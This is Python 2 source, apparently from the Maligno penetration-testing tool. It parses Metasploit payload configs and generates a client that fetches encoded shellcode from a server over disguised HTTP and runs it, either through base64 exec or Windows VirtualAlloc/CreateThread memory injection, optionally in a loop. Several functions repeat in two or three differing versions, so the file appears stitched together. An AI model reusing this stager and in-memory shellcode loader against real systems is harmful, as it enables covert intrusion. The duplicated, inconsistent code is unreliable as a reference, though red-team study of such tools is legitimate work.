def get_scope_config(config_file): tree = None root = None check_file_exists(config_file) section = "ServerConfig -> Scope" try: tree = ET.parse(config_file) root = tree.getroot() except: malout.print_config_error(config_file, section, "", malout.INVALID_CHARS) sys.exit() scope = [] try: for child in root.find("Scope"): ip = child.text if ip: if ip.find("/") > -1: for c in ipcalc.Network(ip): scope.append(str(c)) else: scope.append(ip) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, config_file)) sys.exit() if not scope: malout.print_config_error(config_file, section, "network", malout.EMPTY_VALUE) sys.exit() return scope
def get_profile_client_header_config(profile_file): tree = None root = None check_file_exists(profile_file) section = "ProfileConfig -> Client" try: tree = ET.parse(profile_file) root = tree.getroot() except: malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS) sys.exit() tmp = [] config = [] try: resp = root.find("Client") for child in resp.findall("header"): for c in child: tmp.append([c.tag, c.text]) config.append(dict(tmp)) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file)) sys.exit() return config
def get_server_config(config_file): tree = None root = None check_file_exists(config_file) section = "ServerConfig -> Server" try: tree = ET.parse(config_file) root = tree.getroot() except: malout.print_config_error(config_file, section, "", malout.INVALID_CHARS) sys.exit() config = [] try: for child in root.find("Server"): if child.text: config.append([child.tag, child.text]) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, config_file)) sys.exit() if not config: malout.print_error(malout.EMPTY_SECTION % (section, config_file)) sys.exit() config = dict(config) try: if not config["threading"] or not config["addr"] or not config["port"] or not config["ssl"] or not config["sslcert"] or not config["proxy"] or not config["proxyport"] or not config["profile"] or not config["failsafe"]: raise KeyError check_host_value(config["addr"], "addr") check_legal_port(config["port"], "port") check_legal_port(config["proxyport"], "proxyport") check_boolean_value(config["ssl"], "ssl") check_boolean_value(config["proxy"], "proxy") check_boolean_value(config["threading"], "threading") check_boolean_value(config["failsafe"], "failsafe") except KeyError as key: malout.print_config_error(config_file, section, key, malout.EMPTY_VALUE) sys.exit() except malex.IllegalHostValue as v: malout.print_config_error(config_file, section, v, malout.INVALID_HOST) sys.exit() except malex.IllegalPort as p: malout.print_config_error(config_file, section, p, malout.INVALID_PORT) sys.exit() except malex.NotBoolean as b: malout.print_config_error(config_file, section, b, malout.BOOLEAN_VALUE) sys.exit() return config
def check_file_exists(filename): if not os.path.exists(filename): malout.print_error("File \"%s\" cannot be found.\n" % filename) sys.exit() if not os.path.isfile(filename): malout.print_error("File \"%s\" is a directory or not a regular file.\n" % filename) sys.exit()
def get_profile_request_config(profile_file): tree = None root = None check_file_exists(profile_file) section = "ProfileConfig -> Server -> Request" try: tree = ET.parse(profile_file) root = tree.getroot() except: malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS) sys.exit() config = [] try: req = root.find("Server").find("Request") for child in req: if child.text: config.append([child.tag, child.text]) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file)) sys.exit() if not config: malout.print_error(malout.EMPTY_SECTION % (section, profile_file)) sys.exit() config = dict(config) try: if not config["method"] or not config["page"] or not config["parameter"] or not config["location"]: raise KeyError check_legal_http_method(config["method"], "method") check_legal_parameter_location(config["location"], "location") check_legal_parameter_config(config["method"], config["location"], "location") except KeyError as key: malout.print_config_error(profile_file, section, key, malout.EMPTY_VALUE) sys.exit() except malex.IllegalMethod as m: malout.print_config_error(profile_file, section, m, malout.INVALID_METHOD) sys.exit() except malex.IllegalLocation as l: malout.print_config_error(profile_file, section, l, malout.INVALID_LOCATION) sys.exit() except malex.IllegalConfig as l: malout.print_config_error(profile_file, section, l, malout.INVALID_LOCATION_METHOD) sys.exit() return config
def get_client_template(template_file): try: fr = open(template_file, 'r') content = fr.read().splitlines() fr.close() except IOError: malout.print_error("Could not find %s." % template_file) sys.exit() return content
def get_client_template(template_file): try: fr = open(template_file, "r") content = fr.read().splitlines() fr.close() except IOError: malout.print_error("Could not find %s." % template_file) sys.exit() return content
def get_profile_response_config(profile_file): tree = None root = None check_file_exists(profile_file) section = "ProfileConfig -> Server -> Response" try: tree = ET.parse(profile_file) root = tree.getroot() except: malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS) sys.exit() config = [] try: resp = root.find("Server").find("Response") for child in resp: if child.text and child.tag != "header" and child.tag != "body": config.append([child.tag, child.text]) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file)) sys.exit() if not config: malout.print_error(malout.EMPTY_SECTION % (section, profile_file)) sys.exit() config = dict(config) try: if not config["protocol"] or not config["banner"] or not config["lastresort"] or not config["errortemplate"]: raise KeyError check_legal_protocol(config["protocol"], "protocol") check_file_path(config["errortemplate"], "errortemplate") except KeyError as key: malout.print_config_error(profile_file, section, key, malout.EMPTY_VALUE) sys.exit() except malex.IllegalProtocol as p: malout.print_config_error(profile_file, section, p, malout.INVALID_PROTOCOL) sys.exit() except IOError as f: malout.print_config_error(profile_file, section, f, malout.FILE_NOT_FOUND) sys.exit() return config
def generate_client_file(script_code, output_file): try: fw = open(output_file, "w") fw.write("#!/usr/bin/python\n") for line in script_code: fw.write(line + "\n") fw.close() malout.print_ok('Client file "%s" successfully written!\n' % output_file) except IOError: malout.print_error("Could not save client code in %s.\n" % output_file) return
def generate_client_file(script_code, output_file): try: fw = open(output_file, 'w') fw.write("#!/usr/bin/python\n") for line in script_code: fw.write(line + "\n") fw.close() malout.print_ok("Client file \"%s\" successfully written!\n" % output_file) except IOError: malout.print_error("Could not save client code in %s.\n" % output_file) return
def get_profile_client_config(profile_file): tree = None root = None check_file_exists(profile_file) section = "ProfileConfig -> Client" try: tree = ET.parse(profile_file) root = tree.getroot() except: malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS) sys.exit() config = [] try: for child in root.find("Client"): if child.text: config.append([child.tag, child.text]) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file)) sys.exit() if not config: malout.print_error(malout.EMPTY_SECTION % (section, profile_file)) sys.exit() config = dict(config) try: if not config["maxnaptime"]: raise KeyError check_non_negative_value(config["maxnaptime"], "maxnaptime") except KeyError as key: malout.print_config_error(profile_file, section, key, malout.EMPTY_VALUE) sys.exit() except malex.NegativeValue as n: malout.print_config_error(profile_file, section, n, malout.NON_NEGATIVE_VALUE) sys.exit() return config
def get_metasploit_config(config_file): tree = None root = None check_file_exists(config_file) section = "ServerConfig -> Metasploit" try: tree = ET.parse(config_file) root = tree.getroot() except: malout.print_config_error(config_file, section, "", malout.INVALID_CHARS) sys.exit() config = [] try: for child in root.find("Metasploit"): if child.text and child.tag != "msfpayload": config.append([child.tag, child.text]) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, config_file)) sys.exit() if not config: malout.print_error(malout.EMPTY_SECTION % (section, config_file)) sys.exit() config = dict(config) try: if not config["path"] or not config["cachefolder"] or not config["resourcefolder"]: raise KeyError check_file_path(config["path"] + "msfvenom", "path") except KeyError as key: malout.print_config_error(config_file, section, key, malout.EMPTY_VALUE) sys.exit() except IOError as i: malout.print_config_error(config_file, section, i, malout.PATH_MSFVENOM) sys.exit() return config
def check_for_updates(version): try: http_conn = httplib.HTTPConnection("www.encripto.no", 80, timeout=10) headers = {"User-Agent": "Mozilla/5.0 (compatible; Maligno-Srv/" + version + ")"} http_conn.request("HEAD", "/tools/maligno-" + version + ".tar.gz", None, headers) http_resp = http_conn.getresponse() if http_resp.status == 404: print "" malout.print_ok("There is a new version of Maligno!") malout.print_ok("Check http://www.encripto.no/tools for more information.\n") elif http_resp.status == 200: malout.print_ok("You are running the latest version of Maligno.\n") http_conn.close() except: malout.print_error("Could not check for updates...\n") return
def generate_client_code( server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, msfpayload, package, standalone, ): client_code = [] get_caught_mode = False if int(profile_network_config["getcaught"]) > 1: get_caught_mode = True for template_line in client_template: if template_line == "<CONFIG>": req_prefix = "" req_suffix = "" resp_prefix = "" resp_suffix = "" try: req_prefix = urllib.unquote(profile_request_config["prefix"]) except KeyError: pass try: req_suffix = urllib.unquote(profile_request_config["suffix"]) except KeyError: pass try: resp_prefix = urllib.unquote(profile_response_config["prefix"]) except KeyError: pass try: resp_suffix = urllib.unquote(profile_response_config["suffix"]) except KeyError: pass client_code.append('cfg_encoding_method = "' + profile_network_config["encoding"] + '"') client_code.append("cfg_encoding_rounds = " + profile_network_config["rounds"] + "") client_code.append('cfg_secret = "' + profile_network_config["secret"] + '"') client_code.append('cfg_http_method = "' + profile_request_config["method"] + '"') client_code.append('cfg_req_page = "' + profile_request_config["page"] + '"') client_code.append('cfg_req_param = "' + profile_request_config["parameter"] + '"') client_code.append('cfg_param_location = "' + profile_request_config["location"] + '"') client_code.append('cfg_req_prefix = "' + req_prefix + '"') client_code.append('cfg_req_suffix = "' + req_suffix + '"') client_code.append('cfg_resp_prefix = "' + resp_prefix + '"') client_code.append('cfg_resp_suffix = "' + resp_suffix + '"') client_code.append('cfg_payload_id = "' + str(msfpayload["id"]) + '"') client_code.append("cfg_max_nap_time = " + profile_client_config["maxnaptime"] + "") client_code.append('cfg_server_addr = "' + server_config["addr"] + '"') client_code.append('cfg_server_port = "' + server_config["port"] + '"') client_code.append("cfg_get_caught = " + str(profile_network_config["getcaught"]) + "") client_code.append("cfg_req_delay = " + str(profile_network_config["reqdelay"]) + "") if profile_response_config["protocol"].upper() == "HTTP/1.0": client_code.append("cfg_http_10 = True") else: client_code.append("cfg_http_10 = False") if server_config["ssl"].upper() in ["TRUE"]: client_code.append("cfg_ssl = True") else: client_code.append("cfg_ssl = False") if server_config["failsafe"].upper() in ["TRUE"]: client_code.append("cfg_failsafe = True") else: client_code.append("cfg_failsafe = False") code_line = "cfg_http_headers = [ " if profile_client_header_config: header_count = 1 cookie_processed = False for header in profile_client_header_config: if header: if str(header["field"]).rstrip().lstrip().upper() in ["COOKIE"] and profile_request_config[ "location" ].upper() in ["COOKIE"]: req_cookie = "" if header["value"]: req_cookie += str(header["value"]).rstrip().lstrip() if len(req_prefix) > 0: req_cookie += "; %s; " % (req_prefix) req_cookie += "%s=%s" % ( str(profile_request_config["parameter"]).rstrip().lstrip(), str(msfpayload["id"]).rstrip().lstrip(), ) if len(req_suffix) > 0: req_cookie += "; %s" % (req_suffix) code_line += '{ "field":"%s", "value":"%s" }' % ( str(header["field"]).rstrip().lstrip(), urllib.unquote(req_cookie), ) cookie_processed = True elif server_config["failsafe"].upper() in ["TRUE"] and str( header["field"] ).rstrip().lstrip().upper() in ["CONTENT-MD5"]: malout.print_error("Failsafe mode is enabled and it actively uses a Content-MD5 header.") malout.print_error("Ignoring Content-MD5 client header...") else: code_line += '{ "field":"%s", "value":"%s" }' % ( str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip(), ) header_count += 1 else: print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n" if header_count <= len(profile_client_header_config): code_line += ", " else: if profile_request_config["location"].upper() in ["COOKIE"] and not cookie_processed: req_cookie = "" if len(req_prefix) > 0: req_cookie += "%s; " % (req_prefix) req_cookie += "%s=%s" % ( str(profile_request_config["parameter"]).rstrip().lstrip(), str(msfpayload["id"]).rstrip().lstrip(), ) if len(req_suffix) > 0: req_cookie += "; %s" % (req_suffix) code_line += ', { "field":"Cookie", "value":"%s" }' % (urllib.unquote(req_cookie)) code_line += " ]" client_code.append(code_line) elif template_line == " <CTEXT>": client_code.append(' m_ctext = "' + package + '"') elif template_line == " <EXECUTION>": if not get_caught_mode or standalone: if msfpayload["payload"].find("python") > -1: code_line = " exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]](m_shellcode)))" else: if msfpayload["perpetual"].upper() in ["TRUE"]: code_line = """ m_shellcode = m_shellcode.decode("string_escape") m_shellcode = bytearray(m_shellcode) while(1): ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(m_shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(m_shellcode))) bff = (ctypes.c_char * len(m_shellcode)).from_buffer(m_shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(m_shellcode))) thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1)) sleep(30)""" else: code_line = """ m_shellcode = m_shellcode.decode("string_escape") m_shellcode = bytearray(m_shellcode) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(m_shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(m_shellcode))) bff = (ctypes.c_char * len(m_shellcode)).from_buffer(m_shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(m_shellcode))) thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))""" else: code_line = " pass" client_code.append(code_line) elif template_line.startswith("#"): continue else: client_code.append(template_line) return client_code
def generate_client_code(server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, msfpayload, package, standalone): client_code = [] get_caught_mode = False if int(profile_network_config["getcaught"]) > 1: get_caught_mode = True for template_line in client_template: if template_line == "<CONFIG>": req_prefix = "" req_suffix = "" resp_prefix = "" resp_suffix = "" try: req_prefix = urllib.unquote(profile_request_config["prefix"]) except KeyError: pass try: req_suffix = urllib.unquote(profile_request_config["suffix"]) except KeyError: pass try: resp_prefix = urllib.unquote(profile_response_config["prefix"]) except KeyError: pass try: resp_suffix = urllib.unquote(profile_response_config["suffix"]) except KeyError: pass client_code.append("cfg_encoding_method = \"" + profile_network_config["encoding"] + "\"") client_code.append("cfg_encoding_rounds = " + profile_network_config["rounds"] + "") client_code.append("cfg_secret = \"" + profile_network_config["secret"] + "\"") client_code.append("cfg_http_method = \"" + profile_request_config["method"] + "\"") client_code.append("cfg_req_page = \"" + profile_request_config["page"] + "\"") client_code.append("cfg_req_param = \"" + profile_request_config["parameter"] + "\"") client_code.append("cfg_param_location = \"" + profile_request_config["location"] + "\"") client_code.append("cfg_req_prefix = \"" + req_prefix + "\"") client_code.append("cfg_req_suffix = \"" + req_suffix + "\"") client_code.append("cfg_resp_prefix = \"" + resp_prefix + "\"") client_code.append("cfg_resp_suffix = \"" + resp_suffix + "\"") client_code.append("cfg_payload_id = \"" + str(msfpayload["id"]) + "\"") client_code.append("cfg_max_nap_time = " + profile_client_config["maxnaptime"] + "") client_code.append("cfg_server_addr = \"" + server_config["addr"] + "\"") client_code.append("cfg_server_port = \"" + server_config["port"] + "\"") client_code.append("cfg_get_caught = " + str(profile_network_config["getcaught"]) + "") client_code.append("cfg_req_delay = " + str(profile_network_config["reqdelay"]) + "") if profile_response_config["protocol"].upper() == "HTTP/1.0": client_code.append("cfg_http_10 = True") else: client_code.append("cfg_http_10 = False") if server_config["ssl"].upper() in ["TRUE"]: client_code.append("cfg_ssl = True") else: client_code.append("cfg_ssl = False") if server_config["failsafe"].upper() in ["TRUE"]: client_code.append("cfg_failsafe = True") else: client_code.append("cfg_failsafe = False") code_line = "cfg_http_headers = [ " if profile_client_header_config: header_count = 1 cookie_processed = False for header in profile_client_header_config: if header: if str(header["field"]).rstrip().lstrip().upper() in [ "COOKIE" ] and profile_request_config["location"].upper() in [ "COOKIE" ]: req_cookie = "" if header["value"]: req_cookie += str( header["value"]).rstrip().lstrip() if len(req_prefix) > 0: req_cookie += "; %s; " % (req_prefix) req_cookie += "%s=%s" % (str( profile_request_config["parameter"]).rstrip( ).lstrip(), str( msfpayload["id"]).rstrip().lstrip()) if len(req_suffix) > 0: req_cookie += "; %s" % (req_suffix) code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % ( str(header["field"]).rstrip().lstrip(), urllib.unquote(req_cookie)) cookie_processed = True elif server_config["failsafe"].upper() in [ "TRUE" ] and str( header["field"]).rstrip().lstrip().upper() in [ "CONTENT-MD5" ]: malout.print_error( "Failsafe mode is enabled and it actively uses a Content-MD5 header." ) malout.print_error( "Ignoring Content-MD5 client header...") else: code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % ( str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip()) header_count += 1 else: print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n" if header_count <= len(profile_client_header_config): code_line += ", " else: if profile_request_config["location"].upper() in [ "COOKIE" ] and not cookie_processed: req_cookie = "" if len(req_prefix) > 0: req_cookie += "%s; " % (req_prefix) req_cookie += "%s=%s" % (str( profile_request_config["parameter"]).rstrip( ).lstrip(), str( msfpayload["id"]).rstrip().lstrip()) if len(req_suffix) > 0: req_cookie += "; %s" % (req_suffix) code_line += ", { \"field\":\"Cookie\", \"value\":\"%s\" }" % ( urllib.unquote(req_cookie)) code_line += " ]" client_code.append(code_line) elif template_line == " <CTEXT>": client_code.append(" m_ctext = \"" + package + "\"") elif template_line == " <EXECUTION>": if not get_caught_mode or standalone: if msfpayload["payload"].find("python") > -1: code_line = " exec(base64.b64decode({2:str,3:lambda b:bytes(b,'UTF-8')}[sys.version_info[0]](m_shellcode)))" else: if msfpayload["perpetual"].upper() in ["TRUE"]: code_line = """ m_shellcode = m_shellcode.decode("string_escape") m_shellcode = bytearray(m_shellcode) while(1): ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(m_shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(m_shellcode))) bff = (ctypes.c_char * len(m_shellcode)).from_buffer(m_shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(m_shellcode))) thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1)) sleep(30)""" else: code_line = """ m_shellcode = m_shellcode.decode("string_escape") m_shellcode = bytearray(m_shellcode) ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(m_shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) ctypes.windll.kernel32.VirtualLock(ctypes.c_int(ptr), ctypes.c_int(len(m_shellcode))) bff = (ctypes.c_char * len(m_shellcode)).from_buffer(m_shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(ptr), bff, ctypes.c_int(len(m_shellcode))) thread = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(ptr), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(thread),ctypes.c_int(-1))""" else: code_line = " pass" client_code.append(code_line) elif template_line.startswith("#"): continue else: client_code.append(template_line) return client_code
def get_profile_network_config(profile_file): tree = None root = None check_file_exists(profile_file) section = "ProfileConfig -> Network" try: tree = ET.parse(profile_file) root = tree.getroot() except: malout.print_config_error(profile_file, section, "", malout.INVALID_CHARS) sys.exit() config = [] try: for child in root.find("Network"): if child.text: config.append([child.tag, child.text]) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, profile_file)) sys.exit() if not config: malout.print_error(malout.EMPTY_SECTION % (section, profile_file)) sys.exit() config = dict(config) try: if not config["encoding"] or not config["rounds"] or not config["blocksize"] or not config["paddingchar"] or not config["secret"] or not config["getcaught"] or not config["reqdelay"]: raise KeyError check_encoding_value(config["encoding"], "encoding") check_non_negative_value(config["getcaught"], "getcaught") check_non_negative_value(config["reqdelay"], "reqdelay") check_positive_value(config["rounds"], "rounds") check_block_size(config["blocksize"], "blocksize") check_key_length(config["blocksize"], config["secret"], "secret") except KeyError as key: malout.print_config_error(profile_file, section, key, malout.EMPTY_VALUE) sys.exit() except malex.IllegalEncoding as e: malout.print_config_error(profile_file, section, e, malout.ENCODING_VALUE) sys.exit() except malex.NegativeValue as n: malout.print_config_error(profile_file, section, n, malout.NON_NEGATIVE_VALUE) sys.exit() except malex.NonNegativeValue as n: malout.print_config_error(profile_file, section, n, malout.POSITIVE_VALUE) sys.exit() except malex.IllegalBlockSize as b: malout.print_config_error(profile_file, section, b, malout.BLOCK_SIZE_VALUE) sys.exit() except malex.IllegalKeySize as k: malout.print_config_error(profile_file, section, k, malout.KEY_SIZE_VALUE) sys.exit() return config
def generate_client_code(server_config, profile_request_config, profile_response_config, profile_network_config, profile_client_config, profile_client_header_config, client_template, msfpayload, package, standalone): client_code = [] get_caught_mode = False if int(profile_network_config["getcaught"]) > 1: get_caught_mode = True for template_line in client_template: if template_line == "<CONFIG>": req_prefix = "" req_suffix = "" resp_prefix = "" resp_suffix = "" try: req_prefix = urllib.unquote(profile_request_config["prefix"]) except KeyError: pass try: req_suffix = urllib.unquote(profile_request_config["suffix"]) except KeyError: pass try: resp_prefix = urllib.unquote(profile_response_config["prefix"]) except KeyError: pass try: resp_suffix = urllib.unquote(profile_response_config["suffix"]) except KeyError: pass client_code.append("cfg_encoding_method = \"" + profile_network_config["encoding"] + "\"") client_code.append("cfg_encoding_rounds = " + profile_network_config["rounds"] + "") client_code.append("cfg_secret = \"" + profile_network_config["secret"] + "\"") client_code.append("cfg_http_method = \"" + profile_request_config["method"] + "\"") client_code.append("cfg_req_page = \"" + profile_request_config["page"] + "\"") client_code.append("cfg_req_param = \"" + profile_request_config["parameter"] + "\"") client_code.append("cfg_param_location = \"" + profile_request_config["location"] + "\"") client_code.append("cfg_req_prefix = \"" + req_prefix + "\"") client_code.append("cfg_req_suffix = \"" + req_suffix + "\"") client_code.append("cfg_resp_prefix = \"" + resp_prefix + "\"") client_code.append("cfg_resp_suffix = \"" + resp_suffix + "\"") client_code.append("cfg_payload_id = \"" + str(msfpayload["id"]) + "\"") client_code.append("cfg_max_nap_time = " + profile_client_config["maxnaptime"] + "") client_code.append("cfg_server_addr = \"" + server_config["addr"] + "\"") client_code.append("cfg_server_port = \"" + server_config["port"] + "\"") client_code.append("cfg_get_caught = " + str(profile_network_config["getcaught"]) + "") client_code.append("cfg_req_delay = " + str(profile_network_config["reqdelay"]) + "") if profile_response_config["protocol"].upper() == "HTTP/1.0": client_code.append("cfg_http_10 = True") else: client_code.append("cfg_http_10 = False") if server_config["ssl"].upper() in ["TRUE"]: client_code.append("cfg_ssl = True") else: client_code.append("cfg_ssl = False") if server_config["failsafe"].upper() in ["TRUE"]: client_code.append("cfg_failsafe = True") else: client_code.append("cfg_failsafe = False") if msfpayload["payload"].find("python") > -1: client_code.append("cfg_payload_type = 0") else: client_code.append("cfg_payload_type = 1") if msfpayload["perpetual"].upper() in ["TRUE"]: client_code.append("cfg_perpetual_payload = True") else: client_code.append("cfg_perpetual_payload = False") code_line = "cfg_http_headers = [ " if profile_client_header_config: header_count = 1 cookie_processed = False for header in profile_client_header_config: if header: if str(header["field"]).rstrip().lstrip().upper() in [ "COOKIE" ] and profile_request_config["location"].upper() in [ "COOKIE" ]: req_cookie = "" if header["value"]: req_cookie += str( header["value"]).rstrip().lstrip() if len(req_prefix) > 0: req_cookie += "; %s; " % (req_prefix) req_cookie += "%s=%s" % (str( profile_request_config["parameter"]).rstrip( ).lstrip(), str( msfpayload["id"]).rstrip().lstrip()) if len(req_suffix) > 0: req_cookie += "; %s" % (req_suffix) code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % ( str(header["field"]).rstrip().lstrip(), urllib.unquote(req_cookie)) cookie_processed = True elif server_config["failsafe"].upper() in [ "TRUE" ] and str( header["field"]).rstrip().lstrip().upper() in [ "CONTENT-MD5" ]: malout.print_error( "Failsafe mode is enabled and it actively uses a Content-MD5 header." ) malout.print_error( "Ignoring Content-MD5 client header...") else: code_line += "{ \"field\":\"%s\", \"value\":\"%s\" }" % ( str(header["field"]).rstrip().lstrip(), str(header["value"]).rstrip().lstrip()) header_count += 1 else: print "\n[-] There was a problem while parsing one of the client headers. Ingnoring it...\n" if header_count <= len(profile_client_header_config): code_line += ", " else: if profile_request_config["location"].upper() in [ "COOKIE" ] and not cookie_processed: req_cookie = "" if len(req_prefix) > 0: req_cookie += "%s; " % (req_prefix) req_cookie += "%s=%s" % (str( profile_request_config["parameter"]).rstrip( ).lstrip(), str( msfpayload["id"]).rstrip().lstrip()) if len(req_suffix) > 0: req_cookie += "; %s" % (req_suffix) code_line += ", { \"field\":\"Cookie\", \"value\":\"%s\" }" % ( urllib.unquote(req_cookie)) code_line += " ]" client_code.append(code_line) elif template_line == " <CTEXT>": client_code.append(" m_ctext = \"" + package + "\"") elif template_line.startswith("#"): continue else: client_code.append(template_line) return client_code
def get_payload_config(config_file): tree = None root = None check_file_exists(config_file) section = "ServerConfig -> Metasploit -> msfpayload" try: tree = ET.parse(config_file) root = tree.getroot() except: malout.print_config_error(config_file, section, "", malout.INVALID_CHARS) sys.exit() tmp = [] config = [] try: msf = root.find("Metasploit") for child in msf.findall("msfpayload"): for c in child: tmp.append([c.tag, c.text]) config.append(dict(tmp)) except TypeError: malout.print_error(malout.NO_SECTION_FOUND % (section, config_file)) sys.exit() if not config: malout.print_error(malout.EMPTY_SECTION % (section, config_file)) sys.exit() try: for p in config: if not p["id"] or not p["payload"] or not p["lhost"] or not p["lport"] or not p["encoder"] or not p["badchars"] or not p["iterations"] or not p["perpetual"]: raise KeyError check_host_value(p["lhost"], "lhost") check_legal_port(p["lport"], "lport") check_positive_value(p["iterations"], "iterations") check_boolean_value(p["perpetual"], "perpetual") except KeyError as key: malout.print_config_error(config_file, section, key, malout.EMPTY_VALUE) sys.exit() except malex.IllegalHostValue as v: malout.print_config_error(config_file, section, v, malout.INVALID_HOST) sys.exit() except malex.IllegalPort as p: malout.print_config_error(config_file, section, p, malout.INVALID_PORT) sys.exit() except malex.NonNegativeValue as v: malout.print_config_error(config_file, section, v, malout.POSITIVE_VALUE) sys.exit() except malex.NotBoolean as b: malout.print_config_error(config_file, section, b, malout.BOOLEAN_VALUE) sys.exit() return config